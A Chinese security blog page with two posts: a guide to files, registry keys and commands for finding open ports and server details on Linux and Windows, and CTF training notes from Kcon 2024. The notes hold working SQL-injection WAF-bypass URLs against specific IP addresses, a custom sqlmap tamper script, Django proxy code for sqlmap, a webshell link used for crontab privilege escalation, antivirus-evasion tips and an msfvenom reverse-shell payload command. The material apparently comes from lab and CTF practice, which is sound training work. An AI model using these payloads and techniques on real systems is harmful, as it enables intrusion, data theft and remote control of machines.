漏洞利用 on 静静的安全笔记

Linux服务器端口和基本信息侦察指南

Wed, 22 Oct 2025 22:21:58 +0000

Linux服务器端口和基本信息侦察指南

在渗透测试或安全评估中,了解目标服务器开放的端口和基本信息是至关重要的第一步。服务器通常不会直接展示所有开放端口和详细信息,但通过一些常见的服务和文件,攻击者可以获取这些信息。以下是服务器上常见的文件、服务和配置,它们可能直接或间接地透露开放的端口和服务器的基本信息。

参考：作为运维，应该掌握的 50 个 Linux 上重要的配置文件

1. 基础系统信息文件

1.1. `/etc/services`

描述: 该文件包含了服务名称与端口号及协议的映射关系。虽然它不显示当前服务器实际开放的端口,但它列出了常见的服务及其默认端口,攻击者可以借此了解哪些端口通常用于哪些服务。

路径: /etc/services
用途: 了解常见服务的默认端口,辅助端口扫描和识别

示例内容:

http 80/tcp www www-http # WorldWideWeb HTTP
ssh 22/tcp # SSH Remote Login Protocol
ftp 21/tcp # File Transfer Protocol

1.2. `/etc/hosts`

描述: 该文件用于将主机名映射到IP地址,通常用于本地网络解析。虽然它不直接显示开放的端口,但可以揭示服务器上配置的主机名和内部IP地址。

路径: /etc/hosts
用途: 了解服务器的主机名配置和内部网络结构

示例内容:

127.0.0.1 localhost
192.168.1.10 server1.example.com

1.3. `/etc/hostname`

描述: 该文件包含服务器的主机名。通过查看此文件,攻击者可以了解服务器的名称,有助于进一步的侦察。

路径: /etc/hostname
用途: 获取服务器的主机名

示例内容:

webserver01

1.4. `/etc/resolv.conf`

描述: DNS解析器配置文件。

路径: /etc/resolv.conf
用途: 了解DNS服务器配置,可能揭示内部网络结构

2. 网络连接和端口信息

2.1. `/proc/net/tcp` 和 `/proc/net/udp`

描述: 这些文件提供了当前系统上TCP和UDP连接的状态信息,包括本地和远程地址及端口。通过解析这些文件,可以获取服务器当前活跃的连接和监听端口。

路径:
- TCP: /proc/net/tcp
- UDP: /proc/net/udp
用途: 查看当前系统上的TCP和UDP连接及监听端口

注意: 这些文件的内容是十六进制格式的,需要一定的解析技巧。通常可以使用工具或脚本来解析这些信息。

示例(简化):

sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
 0: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 12345 1 ffff880012345678 100 0 0 10 0

local_address中的端口部分(如 1F90)需要转换为十进制(8080)

2.2. `/proc/net/tcp6` 和 `/proc/net/udp6`

描述: IPv6连接的TCP和UDP状态信息。

路径: /proc/net/tcp6, /proc/net/udp6
用途: 查看IPv6监听端口和连接

2.3. `/proc/net/unix`

描述: Unix域套接字信息。

路径: /proc/net/unix
用途: 了解本地进程间通信(IPC)使用的套接字

2.4. 运行时进程信息

路径:

/proc/[pid]/cmdline: 进程启动命令行
/proc/[pid]/environ: 进程环境变量

用途: 查看服务启动参数和环境变量,可能包含端口绑定信息

3. 网络配置文件

3.1. RHEL/CentOS 网络配置

描述: 网络接口配置文件。

路径: /etc/sysconfig/network-scripts/ifcfg-*
用途: 了解网络接口配置和IP地址

3.2. Debian/Ubuntu 网络配置

描述: 网络接口配置。

路径: /etc/network/interfaces
用途: 查看网络配置和绑定的IP地址

3.3. 网络接口系统信息

描述: 网络接口状态和配置。

路径: /sys/class/net/*/
用途: 查看网络接口状态和配置

4. 超级服务器配置

4.1. `/etc/inetd.conf` 或 `/etc/xinetd.conf`

描述: 这些文件配置了由 inetd或 xinetd管理的服务,这些服务在需要时启动并监听特定端口。

路径:
- inetd: /etc/inetd.conf
- xinetd: /etc/xinetd.conf 或 /etc/xinetd.d/ 目录下的各个文件
用途: 了解由超级服务器管理的服务及其端口

5. Web服务器配置

5.1. Nginx 配置

描述: Nginx的配置文件定义了服务器监听的端口和虚拟主机配置。

路径:
- 主配置: /etc/nginx/nginx.conf
- 站点配置: /etc/nginx/sites-enabled/ 或 /etc/nginx/conf.d/
用途: 查看Nginx监听的端口和处理的站点

5.2. Apache 配置

描述: Apache的配置文件定义了服务器监听的端口和虚拟主机配置。

路径:
- 端口配置: /etc/apache2/ports.conf
- 站点配置: /etc/apache2/sites-enabled/ 或 /etc/apache2/sites-available/
用途: 查看Apache监听的端口和处理的站点

6. 数据库服务配置

6.1. MySQL/MariaDB

路径: /etc/mysql/my.cnf 或 /etc/my.cnf
用途: 查看数据库监听端口(默认3306)和绑定地址

6.2. PostgreSQL

路径: /etc/postgresql/*/main/postgresql.conf
用途: 查看PostgreSQL监听端口和地址

6.3. Redis

路径: /etc/redis/redis.conf
用途: 查看Redis监听端口(默认6379)

6.4. MongoDB

路径: /etc/mongod.conf
用途: 查看MongoDB监听端口(默认27017)

7. 其他网络服务配置

7.1. SSH 配置

路径: /etc/ssh/sshd_config
用途: 查看SSH监听端口(默认22,可能被修改)

7.2. FTP 服务

路径:

vsftpd: /etc/vsftpd.conf
ProFTPD: /etc/proftpd/proftpd.conf

用途: 查看FTP监听端口和配置

7.3. Samba

路径: /etc/samba/smb.conf
用途: 查看SMB/CIFS共享配置

8. 防火墙配置

8.1. iptables

描述: 防火墙规则可以揭示哪些端口是开放的或被允许的。

查看命令: iptables -L -n
配置文件路径: /etc/iptables/rules.v4 或 /etc/sysconfig/iptables(取决于发行版)
用途: 查看防火墙允许的端口和流量规则

8.2. ufw (Uncomplicated Firewall)

查看命令: ufw status
配置文件路径: /etc/ufw/ 目录下
用途: 查看防火墙允许的端口和服务

8.3. firewalld

查看命令: firewall-cmd --list-all
配置文件路径: /etc/firewalld/ 目录下
用途: 查看防火墙允许的服务和端口

9. Systemd 服务管理

9.1. Systemd 服务文件

路径:
- /etc/systemd/system/
- /lib/systemd/system/
用途: 查看通过systemd管理的服务及其配置,可能包含端口信息

10. 容器和虚拟化

10.1. Docker

路径:

/etc/docker/daemon.json
Docker容器信息: docker ps (如果有权限)

用途: 查看Docker端口映射和暴露的服务

10.2. Kubernetes 配置

路径:

~/.kube/config
服务配置: Kubernetes Service和Ingress定义

用途: 查看暴露的服务端口

10.3. 云提供商元数据服务

访问: 通常通过 http://169.254.169.254/
用途: 获取实例元数据,可能包含网络配置信息

11. 系统日志文件

路径:

/var/log/syslog 或 /var/log/messages: 系统日志
/var/log/auth.log 或 /var/log/secure: 认证日志
/var/log/apache2/access.log: Apache访问日志
/var/log/nginx/access.log: Nginx访问日志

用途: 可能包含连接尝试、服务启动信息等

12. 安全策略配置

12.1. SELinux

路径: /etc/selinux/config
查看命令: sestatus
用途: 了解安全策略,可能影响端口访问

12.2. AppArmor

路径: /etc/apparmor.d/
用途: 了解应用程序安全配置文件

13. 定时任务

13.1. Cron 任务

路径:

/etc/crontab
/etc/cron.d/
/var/spool/cron/

用途: 可能包含定期执行的网络服务或端口扫描脚本

14. 应用程序特定配置

14.1. Java 应用

配置文件: application.properties 或 application.yml

14.2. Node.js 应用

配置文件: package.json, .env 文件

14.3. Python 应用

配置文件: settings.py, .env 文件

15. 如何利用这些文件和服务获取信息

15.1. 手动查看

如果有对服务器的Shell访问权限，可以直接查看上述文件，以获取端口和服务信息。示例命令：

# 查看 /etc/services
cat /etc/services

15.1.1. 查看进程

1ps aux

用途: 查看当前运行的进程,可以识别出哪些服务正在运行

15.1.2. 查看监听端口

1sudo netstat -tuln
2# 或
3sudo ss -tuln

输出示例:

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp6 0 0 
22 
* LISTEN
tcp6 0 0 
80 
* LISTEN

说明:

0.0.0.0:22 表示SSH服务在所有接口的22端口监听
0.0.0.0:80 表示HTTP服务在所有接口的80端口监听

注意: 这些命令需要适当的权限(通常是root)才能查看所有监听端口

15.1.3. 查看打开的文件和网络连接

1lsof -i
2# 或查看特定端口
3lsof -i :端口号

用途: 列出打开的网络连接和监听端口

15.2. 自动化工具

使用自动化工具进行端口扫描和服务识别，可以更高效地获取服务器的开放端口和基本信息。- Nmap：强大的网络扫描工具，可以扫描目标服务器的开放端口、运行的服务及其版本。示例命令：

nmap -sV target_ip

说明：

-sV：探测服务版本信息。
Netcat (nc)：可以用于手动连接和探测端口。示例命令：

nc -zv target_ip 1-1000

说明：

-z：扫描模式，不发送数据。
-v：详细输出。

15.3. Web 服务器信息泄露

有时候，Web服务器配置不当，可能会在网页响应头、错误页面或特定URL中泄露服务器信息，包括运行的服务、版本号和开放的端口。

常见信息泄露点：- HTTP 响应头：如 Server: Apache/2.4.41 (Ubuntu)，透露了Web服务器类型和版本。
- 错误页面：如404、500错误页面，可能包含服务器信息。
- 特定URL：如 /phpinfo.php、/admin/等，可能泄露服务器配置。注意：这些信息通常需要通过Web请求获取，而非直接查看服务器文件。—## 3. 安全建议为了防止攻击者通过上述文件和服务获取服务器的敏感信息，建议采取以下安全措施：1. 限制文件访问权限：
- 确保敏感配置文件（如 /etc/hosts、/etc/passwd等）的权限设置正确，避免不必要的读取权限。
隐藏或移除敏感信息：
- 避免在Web应用的错误页面、响应头中泄露服务器信息。
- 移除或禁用不必要的服务，减少攻击面。
使用防火墙：
- 配置防火墙（如 iptables、ufw、firewalld）仅允许必要的端口和流量，限制对管理端口（如SSH的22端口）的访问。
定期更新和打补丁：
- 保持服务器操作系统和软件包的最新状态，修补已知的安全漏洞。
使用安全配置：
- 遵循最小权限原则，仅运行必要的服务，使用强密码和密钥认证。
监控和日志审计：
- 实施日志监控，及时发现异常访问和潜在的攻击行为。

安全建议

最小权限原则: 限制对敏感配置文件的访问权限
定期审计: 定期检查开放的端口和运行的服务
防火墙配置: 只开放必要的端口
日志监控: 监控异常的访问尝试和配置文件访问
文件完整性监控: 使用工具(如AIDE、Tripwire)监控关键配置文件的变化
禁用不必要的服务: 关闭不需要的网络服务以减少攻击面

Windows服务器端口和基本信息侦察指南

在Windows环境中进行渗透测试或安全评估时,了解目标服务器开放的端口和基本信息同样至关重要。Windows服务器通过注册表、配置文件和各种服务来管理网络配置。以下是Windows服务器上常见的文件、注册表项和服务,它们可能直接或间接地透露开放的端口和服务器的基本信息。

参考：【2024/3/12 更新】Windows Server 2019 服务配置与管理汇总

1. 系统基本信息

1.1. 主机名和网络配置

1.1.1. 计算机名称

位置:

注册表: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
文件: 可通过命令 hostname 获取

用途: 获取服务器的计算机名称

1.1.2. Hosts 文件

路径: C:\Windows\System32\drivers\etc\hosts

用途: 了解本地DNS解析配置,可能揭示内部主机名和IP地址映射

示例内容:

127.0.0.1 localhost
192.168.1.10 server1.domain.local
10.0.0.50 database.internal.com

1.1.3. Networks 文件

路径: C:\Windows\System32\drivers\etc\networks

用途: 网络名称与网络地址的映射

1.1.4. Services 文件

路径: C:\Windows\System32\drivers\etc\services

描述: 包含服务名称与端口号及协议的映射关系,类似Linux的 /etc/services

用途: 了解常见Windows服务的默认端口

示例内容:

http 80/tcp
https 443/tcp
smb 445/tcp
rdp 3389/tcp

2. 注册表中的网络配置

2.1. TCP/IP 配置

路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

重要键值:

Hostname: 主机名
Domain: 域名
NameServer: DNS服务器地址
DhcpNameServer: DHCP分配的DNS服务器

用途: 查看网络配置和DNS设置

2.2. 网络接口配置

路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}

重要键值:

IPAddress: 静态IP地址
SubnetMask: 子网掩码
DefaultGateway: 默认网关
DhcpIPAddress: DHCP分配的IP地址

用途: 查看每个网络接口的详细配置

2.3. 端口代理配置

路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy

用途: 查看配置的端口转发规则

3. Windows防火墙配置

3.1. 防火墙规则

路径:

配置文件: C:\Windows\System32\LogFiles\Firewall\pfirewall.log
注册表: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy

PowerShell命令:

1Get-NetFirewallRule | Where-Object {$_.Enabled -eq 'True'}
2Get-NetFirewallPortFilter

用途: 查看防火墙允许的端口和服务

3.2. Windows Defender 防火墙配置文件

路径: C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\

用途: VPN和远程连接配置

4. IIS (Internet Information Services) 配置

4.1. IIS 配置文件

路径:

主配置: C:\Windows\System32\inetsrv\config\applicationHost.config
站点配置: C:\inetpub\wwwroot\web.config
应用程序配置: 各站点目录下的 web.config

用途: 查看IIS监听的端口、绑定的域名和虚拟目录配置

关键配置节点:

1<sites>
2 <site name="Default Web Site" id="1">
3 <bindings>
4 <binding protocol="http" bindingInformation="*:80:" />
5 <binding protocol="https" bindingInformation="*:443:" />
6 </bindings>
7 </site>
8</sites>

4.2. IIS 日志文件

默认路径: C:\inetpub\logs\LogFiles\

用途: 分析访问记录、连接来源和请求模式

5. 远程桌面服务 (RDP)

5.1. RDP 配置

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server

重要键值:

fDenyTSConnections: 0=允许RDP连接, 1=禁用
PortNumber: RDP监听端口(默认3389)

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

用途: 查看RDP服务是否启用及监听端口

6. 数据库服务配置

6.1. Microsoft SQL Server

配置文件路径:

SQL Server 2019: C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\
配置管理器: SQL Server Configuration Manager

注册表路径: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\

日志路径: C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Log\

用途: 查看SQL Server监听端口(默认1433)和实例配置

常用命令:

1Get-Service | Where-Object {$_.Name -like "*SQL*"}

6.2. MySQL/MariaDB (Windows版本)

配置文件:

C:\ProgramData\MySQL\MySQL Server 8.0\my.ini
C:\Program Files\MySQL\MySQL Server 8.0\my.ini

用途: 查看MySQL监听端口(默认3306)和绑定地址

6.3. PostgreSQL (Windows版本)

配置文件: C:\Program Files\PostgreSQL\[version]\data\postgresql.conf

用途: 查看PostgreSQL监听端口和地址

7. 文件共享服务

7.1. SMB/CIFS 共享

查看命令:

1Get-SmbShare
2net share

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares

用途: 查看共享文件夹配置(使用端口445)

7.2. FTP 服务

IIS FTP配置: 包含在 applicationHost.config 中

路径: C:\Windows\System32\inetsrv\config\applicationHost.config

用途: 查看FTP站点绑定和端口(默认21)

8. 邮件服务

8.1. Microsoft Exchange Server

安装路径: C:\Program Files\Microsoft\Exchange Server\

配置路径:

C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\
C:\Program Files\Microsoft\Exchange Server\V15\Bin\

用途: 查看Exchange监听的端口:

SMTP: 25
POP3: 110
IMAP: 143
HTTPS (OWA): 443

8.2. SMTP 服务

IIS SMTP配置:

元数据库: C:\Windows\System32\inetsrv\MetaBase.xml

用途: 查看SMTP中继配置和端口

9. DNS 服务

9.1. Windows DNS Server

配置文件路径: C:\Windows\System32\dns\

区域文件: C:\Windows\System32\dns\*.dns

日志路径: C:\Windows\System32\dns\dns.log

用途: 查看DNS区域配置和解析记录(默认端口53)

10. Active Directory 相关

10.1. Active Directory 配置

数据库路径: C:\Windows\NTDS\ntds.dit

日志路径: C:\Windows\debug\netlogon.log

重要端口:

LDAP: 389
LDAPS: 636
Global Catalog: 3268, 3269
Kerberos: 88

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters

10.2. 组策略对象 (GPO)

路径: C:\Windows\SYSVOL\domain\Policies\

用途: 可能包含网络配置、防火墙规则等策略

11. Web应用服务器

11.1. Apache (Windows版本)

配置文件:

主配置: C:\Apache24\conf\httpd.conf
虚拟主机: C:\Apache24\conf\extra\httpd-vhosts.conf

用途: 查看Apache监听的端口和虚拟主机配置

11.2. Tomcat

配置文件: C:\Program Files\Apache Software Foundation\Tomcat 9.0\conf\server.xml

用途: 查看Tomcat监听端口(默认8080, 8443)

11.3. nginx (Windows版本)

配置文件: C:\nginx\conf\nginx.conf

用途: 查看nginx监听端口和服务器配置

12. 应用程序配置

12.1. .NET 应用程序

配置文件:

web.config (Web应用)
app.config (桌面应用)
appsettings.json (.NET Core)

常见位置: 应用程序根目录

用途: 可能包含数据库连接字符串、API端点等信息

12.2. Java 应用程序

配置文件:

application.properties
application.yml
server.xml

用途: 查看应用监听端口和服务配置

13. VPN和远程访问

13.1. RRAS (Routing and Remote Access Service)

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess

配置文件: 通过远程访问管理控制台配置

用途: 查看VPN配置和端口:

PPTP: 1723
L2TP: 1701
IKEv2: 500, 4500

13.2. VPN连接配置

路径: C:\Users\[Username]\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk

用途: 查看保存的VPN连接配置

14. 系统服务和端口

14.1. 服务列表

注册表路径: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\

查看命令:

1Get-Service
2sc query

用途: 列出所有已安装的服务,识别网络服务

14.2. 启动程序

注册表路径:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

文件系统路径:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

用途: 可能包含自动启动的网络服务或后门程序

15. 日志文件

15.1. Windows事件日志

访问方式: 事件查看器 (eventvwr.msc)

日志位置: C:\Windows\System32\winevt\Logs\

重要日志:

Security.evtx: 安全审计日志
System.evtx: 系统事件日志
Application.evtx: 应用程序日志

PowerShell命令:

1Get-EventLog -LogName Security -Newest 100
2Get-WinEvent -LogName Security

用途: 分析登录尝试、服务启动、网络连接等事件

15.2. IIS日志

路径: C:\inetpub\logs\LogFiles\W3SVC1\

用途: Web访问日志,包含IP地址、请求URI、状态码等

15.3. 防火墙日志

路径: C:\Windows\System32\LogFiles\Firewall\pfirewall.log

用途: 记录防火墙阻止或允许的连接

16. 常用PowerShell和CMD命令

16.1. 查看网络连接和监听端口

 1# 查看所有TCP连接和监听端口
 2netstat -ano
 3netstat -ano | findstr LISTENING
 4
 5# 使用PowerShell查看
 6Get-NetTCPConnection
 7Get-NetTCPConnection -State Listen
 8
 9# 查看UDP端口
10Get-NetUDPEndpoint

输出示例:

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 1000
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1234

16.2. 查看运行的进程

1# 查看所有进程
2Get-Process
3tasklist
4
5# 查看特定端口的进程
6netstat -ano | findstr :80
7Get-Process -Id [PID]

16.3. 查看已安装的程序和服务

1# 查看已安装程序
2Get-WmiObject -Class Win32_Product
3Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*
4
5# 查看服务
6Get-Service
7Get-Service | Where-Object {$_.Status -eq "Running"}

16.4. 查看网络配置

 1# 查看IP配置
 2ipconfig /all
 3Get-NetIPConfiguration
 4Get-NetIPAddress
 5
 6# 查看路由表
 7route print
 8Get-NetRoute
 9
10# 查看DNS缓存
11ipconfig /displaydns
12Get-DnsClientCache
13
14# 查看ARP缓存
15arp -a
16Get-NetNeighbor

16.5. 查看共享和权限

 1# 查看共享文件夹
 2net share
 3Get-SmbShare
 4
 5# 查看共享会话
 6net session
 7Get-SmbSession
 8
 9# 查看打开的文件
10openfiles /query
11Get-SmbOpenFile

16.6. 查看防火墙规则

 1# 查看防火墙状态
 2netsh advfirewall show allprofiles
 3Get-NetFirewallProfile
 4
 5# 查看防火墙规则
 6netsh advfirewall firewall show rule name=all
 7Get-NetFirewallRule | Where-Object {$_.Enabled -eq 'True'}
 8
 9# 查看特定端口的规则
10Get-NetFirewallPortFilter | Where-Object {$_.LocalPort -eq 80}

16.7. 查看计划任务

1# 查看计划任务
2schtasks /query /fo LIST /v
3Get-ScheduledTask | Where-Object {$_.State -eq "Ready"}

16.8. 查看用户和组

 1# 查看本地用户
 2net user
 3Get-LocalUser
 4
 5# 查看本地组
 6net localgroup
 7Get-LocalGroup
 8
 9# 查看登录会话
10query user
11qwinsta

17. WMI (Windows Management Instrumentation) 查询

17.1. 网络适配器配置

1Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where-Object {$_.IPEnabled -eq $true}

17.2. 监听端口

1Get-WmiObject -Class Win32_Process | Where-Object {$_.Name -like "*server*"}

17.3. 已安装的软件

1Get-WmiObject -Class Win32_Product

18. 容器和虚拟化

18.1. Docker (Windows容器)

配置文件: C:\ProgramData\Docker\config\daemon.json

查看命令:

1docker ps
2docker port [container_id]

用途: 查看容器端口映射

18.2. Hyper-V

配置路径: 通过Hyper-V管理器查看

PowerShell命令:

1Get-VM
2Get-VMNetworkAdapter

用途: 查看虚拟机网络配置

19. 云和企业服务

19.1. Azure Arc

配置路径: C:\ProgramData\AzureConnectedMachineAgent\

用途: Azure混合云连接配置

19.2. System Center Configuration Manager (SCCM)

客户端路径: C:\Windows\CCM\

日志路径: C:\Windows\CCM\Logs\

用途: 企业配置管理信息

20. 安全相关配置

20.1. BitLocker配置

注册表路径: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE

用途: 磁盘加密配置

20.2. Windows Defender

配置路径: C:\ProgramData\Microsoft\Windows Defender\

日志路径: C:\ProgramData\Microsoft\Windows Defender\Support\

PowerShell命令:

1Get-MpPreference
2Get-MpComputerStatus

20.3. 审计策略

查看命令:

1auditpol /get /category:*

用途: 了解系统审计配置

21. 证书和加密

21.1. 证书存储

路径: C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\

查看命令:

1Get-ChildItem -Path Cert:\LocalMachine\My
2Get-ChildItem -Path Cert:\CurrentUser\My

用途: 查看安装的SSL/TLS证书,可能揭示服务域名

22. 备份和恢复

22.1. Windows Server Backup

配置路径: 通过Windows Server Backup管理

日志路径: 事件查看器中的 Microsoft-Windows-Backup

用途: 可能包含敏感文件路径和配置信息

安全建议

访问控制: 严格限制对注册表、配置文件和系统目录的访问权限
审计日志: 启用详细的审计日志记录,监控对敏感文件和注册表的访问
防火墙配置: 使用Windows防火墙或第三方防火墙限制入站和出站连接
定期审计: 定期检查开放的端口、运行的服务和启动项
最小化服务: 禁用或删除不必要的服务和功能
补丁管理: 及时应用Windows更新和安全补丁
加密敏感数据: 使用BitLocker加密磁盘,加密敏感配置文件
网络分段: 使用VLAN和防火墙规则隔离敏感服务
监控异常: 使用SIEM工具监控异常的端口扫描和服务访问
强化RDP: 修改RDP默认端口,使用网络级身份验证(NLA),限制访问IP

常见Windows服务端口速查表

服务	默认端口	协议	说明
HTTP	80	TCP	Web服务
HTTPS	443	TCP	加密Web服务
FTP	21	TCP	文件传输
FTPS	990	TCP	加密FTP
SSH	22	TCP	安全Shell
Telnet	23	TCP	远程终端
SMTP	25	TCP	邮件发送
DNS	53	TCP/UDP	域名解析
POP3	110	TCP	邮件接收
IMAP	143	TCP	邮件接收
SNMP	161	UDP	网络管理
LDAP	389	TCP	目录服务
LDAPS	636	TCP	加密LDAP
SMB/CIFS	445	TCP	文件共享
SQL Server	1433	TCP	数据库
MySQL	3306	TCP	数据库
PostgreSQL	5432	TCP	数据库
RDP	3389	TCP	远程桌面
WinRM	5985/5986	TCP	Windows远程管理
Kerberos	88	TCP/UDP	身份验证
Global Catalog	3268/3269	TCP	AD目录服务
Tomcat	8080/8443	TCP	Web应用服务器

2024Kcon培训

Sun, 25 Aug 2024 20:43:45 +0000

SQL注入实战技巧（注入过程中所发现的边缘信息的充分利用）

1http://45.180.243.36/?id=%221%22or%22=`uniunionon`%22

1http://45.180.243.36/?id=%221%22or%22=%27uniunionon%0Aseseselectlectlect%0A1%27%22

slmap无法直接爆，有WAF
过滤空格 %0A 绕过
过滤union 双写可绕过
过滤select，三写绕过

 145.180.243.220/?id=1or''=''
 245.180.243.220/?id="1"or''='uniunionon /**/'
 3
 4http://45.180.243.220/?id=%221%22or%27%27=%27uniunionon%0A%27
 5
 6http://45.180.243.220/?id=%221%22or%27%27=%27uniunionon%0Aseseselectlectlect%27
 7
 8http://45.180.243.220/?id=1%0Auniunionon%0Aseseselectlectlect%0A1,2,3
 9
10http://45.180.243.220/?id=555555%0Auniunionon%0Aseseselectlectlect%0A1,2,3
11
1245.180.243.220/?id=555555%0Auniunionon%0Aseseselectlectlect%0A1,2,scheman_name%0Afrom%0Ainformation_schema.schemata%0Alimit%0A1,1
13
14http://45.180.243.220/?id=555555%0Auniunionon%0Aseseselectlectlect%0A1,2,group_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=”db_6XFkMpnM”
15
16http://45.180.243.220/?id=555555%0Auniunionon%0Aseseselectlectlect%0A1,2,group_concat(column_name)%0Afrom%0Ainformation_schema.columns%0Awhere%0Atable_schema%0A=%0A%22db_6XFkMpnM%22

实战案例(sqlmap的使用技巧)

配置绕过规则复制tamper中的模板cp .\space2plus.py 2024kcom.py修改为如下内容。

 1#!/usr/bin/env python
 2
 3"""
 4Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 5See the file 'LICENSE' for copying permission
 6"""
 7
 8from lib.core.compat import xrange
 9from lib.core.enums import PRIORITY
10
11__priority__ = PRIORITY.LOW
12
13def dependencies():
14 pass
15
16def tamper(payload, **kwargs):
17 """
18 Replaces space character (' ') with plus ('+')
19
20 Notes:
21 * Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the query afterwards
22 * This tamper script works against all databases
23
24 >>> tamper('SELECT id FROM users')
25 'SELECT+id+FROM+users'
26 """
27 payload = payload.replace("SELECT","select")
28 payload = payload.replace("UNION","union")
29 payload = payload.replace("union","ununionion")
30 payload = payload.replace("select","selselselectectect")
31 payload = payload.replace(" ","%0A") #对应之前的绕过检查
32 return payload

带参数绕过

1sqlmap -u "http://45.180.243.31/sql.php?id=1" --tamper=2024kcom.py --dbs -D db_YOARED3v -T db_flag --dump

flag-{xxaq429524e6-ffd6-4c9c-8723-470f8e417424}

同理也可以爆第一个靶场的flag

flag-{xxaq61c44a35-6dce-4406-90b7-7c1cc1b5c5ae}

sql1.php 随机值绕过

前后两次数值不一样

用django创建一个服务，获取动态值，返回即可。

启动一个django服务

1django-admin.exe startproject testsql

创建一个 Kcon.py 文件内容如下。

 1from django.http import HttpResponse
 2import requests
 3def testsql(request):
 4 with requests.Session() as session:
 5 req = session.get("http://45.180.243.152/sql1.php")
 6 req_list = req.text.split("<strong>")
 7 req_list = req_list[1].split("</strong>")
 8 print(req.text)
 9 randome_value = req_list[0].strip()
10 data ={
11 "id":request.GET["id"],
12 "random_value":randome_value
13 }
14 print(data)
15 req = session.post("http://45.180.243.152/sql1.php",data = data)
16 print(request.GET['id'])
17 return HttpResponse(req)

修改 url.py 文件，引入修改后的文件。

1from django.contrib import admin
2from django.urls import path
3from . import view
4
5urlpatterns = [
6 path('admin/', admin.site.urls),
7 path('testsql/',view.testsql),
8 path("testsql2/",view.testsql2),
9]

启动django，打开django启动的页面会话，sqlmap爆

1python manage.py runserver
2python sqlmap.py -u "http://127.0.0.1:8000/testsql/?id=1" --dbs
3python sqlmap.py -u "http://127.0.0.1:8000/testsql/?id=1" -D db_5l6KrvIg -T db_flag -C flag --dump

无回显

抓包后sqlmap爆

原理sqlmap不能识别直接执行sql语句的id，但是浏览器抓包后的请求头可以识别。

1python.exe .\sqlmap.py -r D:\JingJing\Documents\CTF文件\CTF刷题\2024Kcon\norespon.txt -D db_t4P1AxlC -T
2 db_flag -C flag --dump

有多余的执行步骤

view.py 中写入

1def testsql2(request):
2 data = {
3 "random_value" : request.GET['id'],
4 }
5 req = requests.post("http://45.180.243.152/sql3.php",data=data)
6 req = requests.get("http://45.180.243.152/sql3.php?id=run")
7 return HttpResponse(req)

url.py 末尾加上

1path("testsql2/",view.testsql2),

浏览器访问 http://127.0.0.1:8000/testsql2/?id=select+1用sqlmap爆

1python sqlmap.py -u "http://127.0.0.1:8000/testsql2/?id=select+1"
2python sqlmap.py -u "http://127.0.0.1:8000/testsql2/?id=select+1" -D db_fcfUEiY7 -T db_flag -C flag --dump

django后台的数据

实战案例(利用crontab完成特定化场景的提权)

过滤了多种函数，一句话木马不能用，网络存储挂载了crotab文件，并且权限不收敛，挂载使用的是目录，但是可以nfs漏洞可以让其访问所有认证。

修改成大马的内容，https://raw.githubusercontent.com/su18/Stitch/master/stitch.php

近后台找到backup有ctrontab文件，改了就行

crontab新建的文件

flag-{xxaqa7dac329-7a7d-44d1-9a5a-5ec4cff7efca}

实战案例(windows操作系统下多种软件的免杀编写)

msfvenom生成木马，特征明显，容易被杀

–list encodes 查看编码方式

绕过工具

shelter
backdoor-factory 编码白加黑

socket执行python代码，服务器远控。加载器与恶意代码分离。

原本绕不过defender，但是安装了卡巴斯基后可以绕过。卡巴斯基关闭的defender，但是他自己防护能力不强。

实战案例（流量侧网络限制时的攻击绕过）

绕过流量监测。

能链接mssql，能用sql语句生成木马，但是外部不能链接。

实战案例(windows系统仅有写权限时的getshell思路)

ftp去提权

跳到计划任务相关文件夹，抓特定文件到本地读，分析，然后写到服务器。

Kali 生成木马

1msfvenom -p windows/meterpreter/reverse_tcp LHOST=2.2.1.4 LPORT=5252 -f exe -o test.exe

修改test.bat文件为

